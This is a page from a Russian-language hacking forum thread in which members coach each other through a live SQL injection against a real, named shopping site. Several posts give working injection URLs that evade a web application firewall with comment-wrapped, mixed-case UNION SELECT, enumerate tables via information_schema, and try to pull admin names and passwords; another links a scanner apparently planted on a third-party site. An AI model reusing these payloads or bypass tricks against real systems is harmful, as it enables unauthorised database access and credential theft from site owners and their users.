Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 723 of 1207
  1. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    вот в режиме онлайн http://fiascowines.ca/images/gallery/scan.php?
     
    #14441 shuba, 11 Aug 2010
  2. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Фильтруется этот параметр? Чем можно заменить?
    Code:
    group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
     
    #14442 Electr0n, 11 Aug 2010
    Last edited: 11 Aug 2010
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    скажи что именно фильтруется
     
    _________________________
    #14443 Konqi, 11 Aug 2010
  4. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Konqi, что именно не могу понять, как проверить?
     
    #14444 Electr0n, 11 Aug 2010
    Last edited by a moderator: 11 Aug 2010
  5. shuba

    shuba Elder - Старейшина

    Joined:
    22 May 2009
    Messages:
    593
    Likes Received:
    129
    Reputations:
    52
    А что именно то у тебя фильтруется???мб доступа нету к схеме?
     
    #14445 shuba, 11 Aug 2010
    1 person likes this.
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    Потести разные словa,

    union, select, group_concat, table_name, и т.п.

    ошибка - не фильтрирует
    forbidden - фильтрирует

    если конечно это mod_security
     
    _________________________
    #14446 Konqi, 11 Aug 2010
    1 person likes this.
  7. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Konqi, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
    Как остальные запросы фильтровать?
     
    #14447 Electr0n, 11 Aug 2010
  8. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    https://forum.antichat.ru/showpost.php?p=2289579&postcount=14624
     
    #14448 h00lyshit!, 11 Aug 2010
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    обход тем же способом что и union select

    https://forum.antichat.ru/threadnav46016-1343-10.html
     
    _________________________
    #14449 Konqi, 11 Aug 2010
    Last edited: 11 Aug 2010
    1 person likes this.
  10. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...
    Code:
    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
     
    #14450 Electr0n, 11 Aug 2010
    Last edited: 11 Aug 2010
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,table_name,3,4,5,6,7+from+information_schema.%60tables%60--
     
    _________________________
    #14451 Konqi, 11 Aug 2010
  12. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Допустим... хочу вывести все таблицы моим запросом group_concat(table_name+separator+0x7c)+from+infor mation_schema.tables+where+table_schema= как тут быть с фильтром?
    Если можно сразу пример...
     
    #14452 Electr0n, 11 Aug 2010
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT%28TabLe_naMe%29,3,4,5,6,7+from+information_schema.%60tables%60--
     
    _________________________
    #14453 Konqi, 11 Aug 2010
  14. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    поправьте что не так.. не выводит данные
    Code:
    http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,cOnCaT(name,0x3a,password),3,4,5,6,7+from+0x61646d696e--
     
    #14454 Electr0n, 11 Aug 2010
    Last edited: 11 Aug 2010
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    название таблицы в хеше? :confused:
     
    #14455 Seravin, 11 Aug 2010
    Last edited: 11 Aug 2010
  16. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Seravin, да как видишь...
     
    #14456 Electr0n, 11 Aug 2010
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    а может лучше мануал хоть один сначала прочитать прежде чем спрашивать?
     
    #14457 Seravin, 11 Aug 2010
  18. Electr0n

    Electr0n Active Member

    Joined:
    19 Aug 2009
    Messages:
    0
    Likes Received:
    164
    Reputations:
    0
    Seravin, ты можешь помочь или только к манумалам можешь отправить?
     
    #14458 Electr0n, 11 Aug 2010
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    так нельзя

    2 seravin это не хэш это hex
     
    _________________________
    #14459 Konqi, 11 Aug 2010
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    2Konqi ну тоже верно) hex) но надо людей сначала отправлять читать мануалы, а то ж нифига не научаться если их на путь правильный наставлять.
    P.S. Залазь в асю или вылазь из инвиза
     
    #14460 Seravin, 11 Aug 2010
    Last edited: 11 Aug 2010
(You must log in or sign up to post here.)
Page 723 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.